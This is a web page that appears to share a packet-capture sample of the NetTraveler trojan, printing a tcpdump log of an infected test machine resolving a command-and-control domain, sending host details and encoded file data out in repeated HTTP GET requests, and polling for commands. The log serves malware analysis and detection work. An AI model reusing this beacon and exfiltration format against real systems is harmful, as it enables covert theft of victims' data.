Nettraveler Net Traveler Data Personal Information Hijacking Malware Trojan PCAP Traffic Sample

By | January 29, 2016

Download raw PCAP of Nettravler : nettravler.pcap

2013-01-05 22:43:42.583158 IP 172.16.253.130.53 > 4.2.2.2.53: 11908+ A? www.gami1.com. (31)
E..;.c……………5.5.’`U………….www.gami1.com…..
2013-01-05 22:43:43.577967 IP 172.16.253.130.53 > 8.8.8.8.53: 11908+ A? www.gami1.com. (31)
E..;.e……………5.5.’VI………….www.gami1.com…..
2013-01-05 22:43:43.578188 IP 172.16.253.130.53 > 4.2.2.2.53: 11908+ A? www.gami1.com. (31)
E..;.f……………5.5.’`U………….www.gami1.com…..
2013-01-05 22:43:44.085958 IP 4.2.2.2.53 > 172.16.253.130.53: 11908 1/0/0 A 110.34.193.13 (47)
E..Kt4……………5.5.7……………www.gami1.com……………..n”.
2013-01-05 22:43:44.085985 IP 4.2.2.2.53 > 172.16.253.130.53: 11908 1/0/0 A 110.34.193.13 (47)
E..Kt5……………5.5.7……………www.gami1.com……………..n”.

2013-01-05 22:43:44.176309 IP 172.16.253.130.1091 > 110.34.193.13.80: Flags [.], ack 1, win 64240, length 0
E..(.i@…!…..n”…C.P. …..)P…J…
2013-01-05 22:43:44.176508 IP 172.16.253.130.1091 > 110.34.193.13.80: Flags [P.], seq 1:1447, ack 1, win 64240, length 1446: HTTP: GET /fly/2013/2011/nettraveler.asp?hostid=E81B9088&hostname=DellXT&hostip=172.16.253.130&filename=travlerbackinfo-2013-1-14-0-29.dll&filestart=0&filetext=begin::tCvUBC2vGMy3Gu300GKz1EXQaCuRHQgIhFJhMLBUmNNhrtTsN9yhTLJTKhFJs4STgtWw1lvSDEbjIXDEbC4ZDUZ3IzGEsWTZa73Z61ZqzmhNNJjORvOZvMx0EBXNJuMhvO5zEBYKAgKFTMxlOZzNJvNxhNgskplOR2qJlshhMZrEAzEAoIR1NJsMggGQ2GAwFIKkRaMVisxftVeOSTmu3O5FnKodDMckchCxlKNpuDxnRkN6qFFbDYcx4MxKKaPIZQKtMkcym6hDcZSSbjoZTYIDwOBsICMYTbQp5EFvk03mTNoajicrZOBwtQziAc5EDkZk0kFqZLOd7AdrEbS0c2pnwg4xGExSbKtfsmD3EXhvkfkDMAbjAXDYbax6eFtevhZsxgtBYu3AWIBAIBgIC2Uzyc56G3TJHiNXNJGk8uKnlhGY4niczbV4XGU8GXLdIquZjOZy8buM50HefBsN5njb1iRvmROfJ07xA3GlgjYczD4YccjCsx2NsfDoaDYcO9/Dq0x2MZoiodO-kOKn-ndGIxGVyPZ7xv7O3P6Mvd7RqORkIKLThMucpqOosG2wgcDeb5ujt1H89lEZyOsLhsNgzg46lLHanKOmyYZO5kxpJzTMbfBmtg8gwpHk2TV9Dn1RFEXtEeH7P-ZTWcu6HGeTYajj23wzGlVRtMht6tAajabg7mSoQz9R9MfXL7zcNBrRqVCgQTrX4Q6hjcU6re6zyIobzPzjUHuPZC-Y42DMeesoG2WV44aZagus6pisxMdbfWBDfFyNhhj5OGD5zsAzGusD3rwzGeUgdDlbYc7a7Se4-wNrMo4zhU5NPzy2p4AAbdj2LRJhjzSzMaTOdbjTpg2Z2mefix56t6pIysBATo4oeRdfNvzd/N4fZgKQ7TZgGvF6cVk0xy5StACcfFnOpmninigV7vx8oDk7B1zRDycPrfKVTcazdO7153cOcd-UjfNI0fBFg3GI2GWcB8EVKIPlGwrkknFPSsHigx-LIIiZKrqD0pqgt HTTP/1.1
E….j@………n”…C.P. …..)P…….GET /fly/2013/2011/nettraveler.asp?hostid=E81B9088&hostname=DellXT&hostip=172.16.253.130&filename=travlerbackinfo-2013-1-14-0-29.dll&filestart=0&filetext=begin::tCvUBC2vGMy3Gu300GKz1EXQaCuRHQgIhFJhMLBUmNNhrtTsN9yhTLJTKhFJs4STgtWw1lvSDEbjIXDEbC4ZDUZ3IzGEsWTZa73Z61ZqzmhNNJjORvOZvMx0EBXNJuMhvO5zEBYKAgKFTMxlOZzNJvNxhNgskplOR2qJlshhMZrEAzEAoIR1NJsMggGQ2GAwFIKkRaMVisxftVeOSTmu3O5FnKodDMckchCxlKNpuDxnRkN6qFFbDYcx4MxKKaPIZQKtMkcym6hDcZSSbjoZTYIDwOBsICMYTbQp5EFvk03mTNoajicrZOBwtQziAc5EDkZk0kFqZLOd7AdrEbS0c2pnwg4xGExSbKtfsmD3EXhvkfkDMAbjAXDYbax6eFtevhZsxgtBYu3AWIBAIBgIC2Uzyc56G3TJHiNXNJGk8uKnlhGY4niczbV4XGU8GXLdIquZjOZy8buM50HefBsN5njb1iRvmROfJ07xA3GlgjYczD4YccjCsx2NsfDoaDYcO9/Dq0x2MZoiodO-kOKn-ndGIxGVyPZ7xv7O3P6Mvd7RqORkIKLThMucpqOosG2wgcDeb5ujt1H89lEZyOsLhsNgzg46lLHanKOmyYZO5kxpJzTMbfBmtg8gwpHk2TV9Dn1RFEXtEeH7P-ZTWcu6HGeTYajj23wzGlVRtMht6tAajabg7mSoQz9R9MfXL7zcNBrRqVCgQTrX4Q6hjcU6re6zyIobzPzjUHuPZC-Y42DMeesoG2WV44aZagus6pisxMdbfWBDfFyNhhj5OGD5zsAzGusD3rwzGeUgdDlbYc7a7Se4-wNrMo4zhU5NPzy2p4AAbdj2LRJhjzSzMaTOdbjTpg2Z2mefix56t6pIysBATo4oeRdfNvzd/N4fZgKQ7TZgGvF6cVk0xy5StACcfFnOpmninigV7vx8oDk7B1zRDycPrfKVTcazdO7153cOcd-UjfNI0fBFg3GI2GWcB8EVKIPlGwrkknFPSsHigx-LIIiZKrqD0pqgt HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Accept-Language: en-us
Cache-Control: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Host: www.gami1.com
Connection: Keep-Alive
2013-01-05 22:43:44.176669 IP 110.34.193.13.80 > 172.16.253.130.1091: Flags [.], ack 1447, win 64240, length 0
E..(t7……n”…….P.C…). ..P…E………
2013-01-05 22:43:44.274393 IP 110.34.193.13.80 > 172.16.253.130.1091: Flags [P.], seq 1:266, ack 1447, win 64240, length 265: HTTP: HTTP/1.1 200 OK
E..1t8……n”…….P.C…). ..P…….HTTP/1.1 200 OK
Connection: close
Date: Mon, 14 Jan 2013 05:29:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 5
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSQTSRRAR=MGDPMPIBDGBLBKLNGDDDJCDP; path=/
Cache-control: private

Fail!

2013-01-05 22:43:44.452111 IP 172.16.253.130.1092 > 110.34.193.13.80: Flags [.], ack 1, win 64240, length 0
E..(.n@…!…..n”…D.P-…i.9 P…6…
2013-01-05 22:43:44.452336 IP 172.16.253.130.1092 > 110.34.193.13.80: Flags [.], seq 1:1461, ack 1, win 64240, length 1460: HTTP: GET /fly/2013/2011/nettraveler.asp?hostid=E81B9088&hostname=DellXT&hostip=172.16.253.130&filename=travlerbackinfo-2013-1-14-0-29.dll&filestart=0&filetext=begin::tCvUBC2vGMy3Gu300GKz1EXQaCuRHQgIhFJhMLBUmNNhrtTsN9yhTLJTKhFJs4STgtWw1lvSDEbjIXDEbC4ZDUZ3IzGEsWTZa73Z61ZqzmhNNJjORvOZvMx0EBXNJuMhvO5zEBYKAgKFTMxlOZzNJvNxhNgskplOR2qJlshhMZrEAzEAoIR1NJsMggGQ2GAwFIKkRaMVisxftVeOSTmu3O5FnKodDMckchCxlKNpuDxnRkN6qFFbDYcx4MxKKaPIZQKtMkcym6hDcZSSbjoZTYIDwOBsICMYTbQp5EFvk03mTNoajicrZOBwtQziAc5EDkZk0kFqZLOd7AdrEbS0c2pnwg4xGExSbKtfsmD3EXhvkfkDMAbjAXDYbax6eFtevhZsxgtBYu3AWIBAIBgIC2Uzyc56G3TJHiNXNJGk8uKnlhGY4niczbV4XGU8GXLdIquZjOZy8buM50HefBsN5njb1iRvmROfJ07xA3GlgjYczD4YccjCsx2NsfDoaDYcO9/Dq0x2MZoiodO-kOKn-ndGIxGVyPZ7xv7O3P6Mvd7RqORkIKLThMucpqOosG2wgcDeb5ujt1H89lEZyOsLhsNgzg46lLHanKOmyYZO5kxpJzTMbfBmtg8gwpHk2TV9Dn1RFEXtEeH7P-ZTWcu6HGeTYajj23wzGlVRtMht6tAajabg7mSoQz9R9MfXL7zcNBrRqVCgQTrX4Q6hjcU6re6zyIobzPzjUHuPZC-Y42DMeesoG2WV44aZagus6pisxMdbfWBDfFyNhhj5OGD5zsAzGusD3rwzGeUgdDlbYc7a7Se4-wNrMo4zhU5NPzy2p4AAbdj2LRJhjzSzMaTOdbjTpg2Z2mefix56t6pIysBATo4oeRdfNvzd/N4fZgKQ7TZgGvF6cVk0xy5StACcfFnOpmninigV7vx8oDk7B1zRDycPrfKVTcazdO7153cOcd-UjfNI0fBFg3GI2GWcB8EVKIPlGwrkknFPSsHigx-LIIiZKrqD0pqgt HTTP/1.1
E….o@………n”…D.P-…i.9 P… …GET /fly/2013/2011/nettraveler.asp?hostid=E81B9088&hostname=DellXT&hostip=172.16.253.130&filename=travlerbackinfo-2013-1-14-0-29.dll&filestart=0&filetext=begin::tCvUBC2vGMy3Gu300GKz1EXQaCuRHQgIhFJhMLBUmNNhrtTsN9yhTLJTKhFJs4STgtWw1lvSDEbjIXDEbC4ZDUZ3IzGEsWTZa73Z61ZqzmhNNJjORvOZvMx0EBXNJuMhvO5zEBYKAgKFTMxlOZzNJvNxhNgskplOR2qJlshhMZrEAzEAoIR1NJsMggGQ2GAwFIKkRaMVisxftVeOSTmu3O5FnKodDMckchCxlKNpuDxnRkN6qFFbDYcx4MxKKaPIZQKtMkcym6hDcZSSbjoZTYIDwOBsICMYTbQp5EFvk03mTNoajicrZOBwtQziAc5EDkZk0kFqZLOd7AdrEbS0c2pnwg4xGExSbKtfsmD3EXhvkfkDMAbjAXDYbax6eFtevhZsxgtBYu3AWIBAIBgIC2Uzyc56G3TJHiNXNJGk8uKnlhGY4niczbV4XGU8GXLdIquZjOZy8buM50HefBsN5njb1iRvmROfJ07xA3GlgjYczD4YccjCsx2NsfDoaDYcO9/Dq0x2MZoiodO-kOKn-ndGIxGVyPZ7xv7O3P6Mvd7RqORkIKLThMucpqOosG2wgcDeb5ujt1H89lEZyOsLhsNgzg46lLHanKOmyYZO5kxpJzTMbfBmtg8gwpHk2TV9Dn1RFEXtEeH7P-ZTWcu6HGeTYajj23wzGlVRtMht6tAajabg7mSoQz9R9MfXL7zcNBrRqVCgQTrX4Q6hjcU6re6zyIobzPzjUHuPZC-Y42DMeesoG2WV44aZagus6pisxMdbfWBDfFyNhhj5OGD5zsAzGusD3rwzGeUgdDlbYc7a7Se4-wNrMo4zhU5NPzy2p4AAbdj2LRJhjzSzMaTOdbjTpg2Z2mefix56t6pIysBATo4oeRdfNvzd/N4fZgKQ7TZgGvF6cVk0xy5StACcfFnOpmninigV7vx8oDk7B1zRDycPrfKVTcazdO7153cOcd-UjfNI0fBFg3GI2GWcB8EVKIPlGwrkknFPSsHigx-LIIiZKrqD0pqgt HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Accept-Language: en-us
Cache-Control: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Host: www.gami1.com
Connection: Keep-Alive
Cookie: ASPSESSI
2013-01-05 22:43:44.452387 IP 172.16.253.130.1092 > 110.34.193.13.80: Flags [P.], seq 1461:1502, ack 1, win 64240, length 41: HTTP
E..Q.p@…!t….n”…D.P-…i.9 P…….ONIDSQTSRRAR=MGDPMPIBDGBLBKLNGDDDJCDP
2013-01-05 22:43:44.452441 IP 110.34.193.13.80 > 172.16.253.130.1092: Flags [.], ack 1461, win 64240, length 0
E..(t<……n”…….P.Di.9 -…P…1………
2013-01-05 22:43:44.452563 IP 110.34.193.13.80 > 172.16.253.130.1092: Flags [.], ack 1502, win 64240, length 0
E..(t=……n”…….P.Di.9 -…P…0………
2013-01-05 22:43:44.635313 IP 110.34.193.13.80 > 172.16.253.130.1092: Flags [FP.], seq 1:199, ack 1502, win 64240, length 198: HTTP: HTTP/1.1 200 OK
E…t>……n”…….P.Di.9 -…P…`…HTTP/1.1 200 OK
Connection: close
Date: Mon, 14 Jan 2013 05:29:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 5
Content-Type: text/html
Cache-control: private

2013-01-05 22:43:44.748940 IP 172.16.253.130.1093 > 110.34.193.13.80: Flags [.], seq 1:1461, ack 1, win 64240, length 1460: HTTP: GET /fly/2013/2011/nettraveler.asp?hostid=E81B9088&hostname=DellXT&hostip=172.16.253.130&filename=travlerbackinfo-2013-1-14-0-29.dll&filestart=0&filetext=begin::tCvUBC2vGMy3Gu300GKz1EXQaCuRHQgIhFJhMLBUmNNhrtTsN9yhTLJTKhFJs4STgtWw1lvSDEbjIXDEbC4ZDUZ3IzGEsWTZa73Z61ZqzmhNNJjORvOZvMx0EBXNJuMhvO5zEBYKAgKFTMxlOZzNJvNxhNgskplOR2qJlshhMZrEAzEAoIR1NJsMggGQ2GAwFIKkRaMVisxftVeOSTmu3O5FnKodDMckchCxlKNpuDxnRkN6qFFbDYcx4MxKKaPIZQKtMkcym6hDcZSSbjoZTYIDwOBsICMYTbQp5EFvk03mTNoajicrZOBwtQziAc5EDkZk0kFqZLOd7AdrEbS0c2pnwg4xGExSbKtfsmD3EXhvkfkDMAbjAXDYbax6eFtevhZsxgtBYu3AWIBAIBgIC2Uzyc56G3TJHiNXNJGk8uKnlhGY4niczbV4XGU8GXLdIquZjOZy8buM50HefBsN5njb1iRvmROfJ07xA3GlgjYczD4YccjCsx2NsfDoaDYcO9/Dq0x2MZoiodO-kOKn-ndGIxGVyPZ7xv7O3P6Mvd7RqORkIKLThMucpqOosG2wgcDeb5ujt1H89lEZyOsLhsNgzg46lLHanKOmyYZO5kxpJzTMbfBmtg8gwpHk2TV9Dn1RFEXtEeH7P-ZTWcu6HGeTYajj23wzGlVRtMht6tAajabg7mSoQz9R9MfXL7zcNBrRqVCgQTrX4Q6hjcU6re6zyIobzPzjUHuPZC-Y42DMeesoG2WV44aZagus6pisxMdbfWBDfFyNhhj5OGD5zsAzGusD3rwzGeUgdDlbYc7a7Se4-wNrMo4zhU5NPzy2p4AAbdj2LRJhjzSzMaTOdbjTpg2Z2mefix56t6pIysBATo4oeRdfNvzd/N4fZgKQ7TZgGvF6cVk0xy5StACcfFnOpmninigV7vx8oDk7B1zRDycPrfKVTcazdO7153cOcd-UjfNI0fBFg3GI2GWcB8EVKIPlGwrkknFPSsHigx-LIIiZKrqD0pqgt HTTP/1.1
E….u@………n”…E.P..D9.Mk`P…8_..GET /fly/2013/2011/nettraveler.asp?hostid=E81B9088&hostname=DellXT&hostip=172.16.253.130&filename=travlerbackinfo-2013-1-14-0-29.dll&filestart=0&filetext=begin::tCvUBC2vGMy3Gu300GKz1EXQaCuRHQgIhFJhMLBUmNNhrtTsN9yhTLJTKhFJs4STgtWw1lvSDEbjIXDEbC4ZDUZ3IzGEsWTZa73Z61ZqzmhNNJjORvOZvMx0EBXNJuMhvO5zEBYKAgKFTMxlOZzNJvNxhNgskplOR2qJlshhMZrEAzEAoIR1NJsMggGQ2GAwFIKkRaMVisxftVeOSTmu3O5FnKodDMckchCxlKNpuDxnRkN6qFFbDYcx4MxKKaPIZQKtMkcym6hDcZSSbjoZTYIDwOBsICMYTbQp5EFvk03mTNoajicrZOBwtQziAc5EDkZk0kFqZLOd7AdrEbS0c2pnwg4xGExSbKtfsmD3EXhvkfkDMAbjAXDYbax6eFtevhZsxgtBYu3AWIBAIBgIC2Uzyc56G3TJHiNXNJGk8uKnlhGY4niczbV4XGU8GXLdIquZjOZy8buM50HefBsN5njb1iRvmROfJ07xA3GlgjYczD4YccjCsx2NsfDoaDYcO9/Dq0x2MZoiodO-kOKn-ndGIxGVyPZ7xv7O3P6Mvd7RqORkIKLThMucpqOosG2wgcDeb5ujt1H89lEZyOsLhsNgzg46lLHanKOmyYZO5kxpJzTMbfBmtg8gwpHk2TV9Dn1RFEXtEeH7P-ZTWcu6HGeTYajj23wzGlVRtMht6tAajabg7mSoQz9R9MfXL7zcNBrRqVCgQTrX4Q6hjcU6re6zyIobzPzjUHuPZC-Y42DMeesoG2WV44aZagus6pisxMdbfWBDfFyNhhj5OGD5zsAzGusD3rwzGeUgdDlbYc7a7Se4-wNrMo4zhU5NPzy2p4AAbdj2LRJhjzSzMaTOdbjTpg2Z2mefix56t6pIysBATo4oeRdfNvzd/N4fZgKQ7TZgGvF6cVk0xy5StACcfFnOpmninigV7vx8oDk7B1zRDycPrfKVTcazdO7153cOcd-UjfNI0fBFg3GI2GWcB8EVKIPlGwrkknFPSsHigx-LIIiZKrqD0pqgt HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Accept-Language: en-us
Cache-Control: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Host: www.gami1.com
Connection: Keep-Alive
Cookie: ASPSESSI
2013-01-05 22:43:44.748998 IP 172.16.253.130.1093 > 110.34.193.13.80: Flags [P.], seq 1461:1502, ack 1, win 64240, length 41: HTTP
E..Q.v@…!n….n”…E.P..I..Mk`P…….ONIDSQTSRRAR=MGDPMPIBDGBLBKLNGDDDJCDP
2013-01-05 22:43:44.749099 IP 110.34.193.13.80 > 172.16.253.130.1093: Flags [.], ack 1461, win 64240, length 0
E..(tA……n”…….P.E.Mk`..I.P…If……..
2013-01-05 22:43:44.749140 IP 110.34.193.13.80 > 172.16.253.130.1093: Flags [.], ack 1502, win 64240, length 0
E..(tB……n”…….P.E.Mk`..J.P…I=……..
2013-01-05 22:43:44.838945 IP 8.8.8.8.53 > 172.16.253.130.53: 11908 1/0/0 A 110.34.193.13 (47)
E..KtC……………5.5.7……………www.gami1.com……………..n”.
2013-01-05 22:43:44.941942 IP 110.34.193.13.80 > 172.16.253.130.1093: Flags [P.], seq 1:199, ack 1502, win 64240, length 198: HTTP: HTTP/1.1 200 OK
E…tD……n”…….P.E.Mk`..J.P…x…HTTP/1.1 200 OK
Connection: close
Date: Mon, 14 Jan 2013 05:29:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 5
Content-Type: text/html
Cache-control: private

2013-01-05 22:43:45.483080 IP 172.16.253.130.1096 > 110.34.193.13.80: Flags [P.], seq 1:391, ack 1, win 64240, length 390: HTTP: GET /fly/2013/2011/nettraveler.asp?action=getdata HTTP/1.1
E…..@… …..n”…H.P…..Q.[P…….GET /fly/2013/2011/nettraveler.asp?action=getdata HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Accept-Language: en-us
Connection: Keep-Alive
Pragma: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Host: www.gami1.com
Cache-Control: no-cache
Cookie: ASPSESSIONIDSQTSRRAR=MGDPMPIBDGBLBKLNGDDDJCDP
2013-01-05 22:43:45.483187 IP 110.34.193.13.80 > 172.16.253.130.1096: Flags [.], ack 391, win 64240, length 0
E..(tQ……n”…….P.H.Q.[..0MP…2………
2013-01-05 22:43:45.575340 IP 110.34.193.13.80 > 172.16.253.130.1096: Flags [P.], seq 1:274, ack 391, win 64240, length 273: HTTP: HTTP/1.1 200 OK
E..9tR……n”…….P.H.Q.[..0MP…Z”..HTTP/1.1 200 OK
Connection: close
Date: Mon, 14 Jan 2013 05:29:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 79
Content-Type: text/html
Cache-control: private

24C6EC2F_Success:UPLOAD
6000ED23_Success:UPLOAD
28B8253B_Success:UPLOAD

2013-01-05 22:48:47.869138 IP 172.16.253.130.1106 > 110.34.193.13.80: Flags [P.], seq 1:391, ack 1, win 64240, length 390: HTTP: GET /fly/2013/2011/nettraveler.asp?action=getdata HTTP/1.1
E…..@………n”…R.Pn.3.;Je.P…X…GET /fly/2013/2011/nettraveler.asp?action=getdata HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Accept-Language: en-us
Connection: Keep-Alive
Pragma: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Host: www.gami1.com
Cache-Control: no-cache
Cookie: ASPSESSIONIDSQTSRRAR=MGDPMPIBDGBLBKLNGDDDJCDP
2013-01-05 22:48:47.869254 IP 110.34.193.13.80 > 172.16.253.130.1106: Flags [.], ack 391, win 64240, length 0
E..(t…….n”…….P.R;Je.n.5jP………….
2013-01-05 22:48:47.964803 IP 110.34.193.13.80 > 172.16.253.130.1106: Flags [FP.], seq 1:274, ack 391, win 64240, length 273: HTTP: HTTP/1.1 200 OK
E..9t……yn”…….P.R;Je.n.5jP…….HTTP/1.1 200 OK
Connection: close
Date: Mon, 14 Jan 2013 05:34:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 79
Content-Type: text/html
Cache-control: private

24C6EC2F_Success:UPLOAD
6000ED23_Success:UPLOAD
28B8253B_Success:UPLOAD

Share Button

Leave a Reply

Your email address will not be published. Required fields are marked *